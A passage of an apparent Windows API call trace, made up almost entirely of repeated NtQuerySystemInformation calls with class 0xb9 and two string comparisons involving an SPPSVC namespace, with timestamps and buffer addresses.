SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0238.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0238.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0238.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0238.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0238.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0238.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0238.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0238.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0238.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0238.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0238.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0238.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0238.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0238.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0238.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0238.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0238.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0238.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8a0, Length=0x28, ResultLength=0x0) [0238.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0238.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0238.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e880, Length=0x20, ResultLength=0x0) [0238.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0238.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0238.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0238.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0238.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0238.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0238.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0238.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0238.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0238.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.537] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0238.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0238.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0238.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0238.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0238.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0238.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0238.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0238.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0238.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0238.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0238.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0238.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0238.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.607] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0238.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0238.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0238.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0238.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0238.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0238.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0238.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0238.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0238.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0238.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0238.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0238.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0238.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0238.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0238.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0238.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0238.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, 